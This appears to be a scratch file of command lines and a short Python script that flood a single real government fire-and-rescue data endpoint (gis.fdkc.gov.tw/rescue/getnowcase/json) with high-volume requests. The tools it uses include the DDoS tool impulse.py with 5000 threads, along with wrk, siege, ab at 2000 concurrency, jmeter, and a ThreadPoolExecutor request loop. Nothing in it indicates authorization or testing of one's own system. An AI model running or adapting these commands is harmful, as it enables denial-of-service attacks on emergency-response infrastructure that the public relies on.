
python3 impulse.py --method HTTP --time 260 --threads 5000 --target gis.fdkc.gov.tw:443/rescue/getnowcase/json\?getalls=1

wrk -c 250 -t 8 -d 10s -s test.lua https://gis.fdkc.gov.tw/rescue/getnowcase/json\?getalls=1

siege -c 100 -r 200 -d1 'https://gis.fdkc.gov.tw/rescue/getnowcase/json?getalls=1'


jmeter -n -t my_test.jmx -l log.jtl -H my.proxy.server -P 8000

https://gis.fdkc.gov.tw/rescue/getnowcase/json?getalls=1

ab -n 8000 -c 2000 -t 10 -H "Referer: https://gis.fdkc.gov.tw/rescue" "https://gis.fdkc.gov.tw/rescue/getnowcase/json?getalls=1"

import requests
from concurrent.futures import ThreadPoolExecutor
import time

def send_request(url):
    response = requests.get(url)
    # 在这里处理响应，例如打印状态码或内容
    print(response.status_code)
    print(response.text)

url = 'https://gis.fdkc.gov.tw/rescue/getnowcase/json?getalls=1'
concurrent_requests = 100
total_requests = 200

start_time = time.time()

with ThreadPoolExecutor(max_workers=concurrent_requests) as executor:
    futures = [executor.submit(send_request, url) for _ in range(total_requests)]

# 等待所有请求完成
for future in futures:
    future.result()

end_time = time.time()
execution_time = end_time - start_time
print(f"总共发送了{total_requests}个请求，总耗时：{execution_time}秒")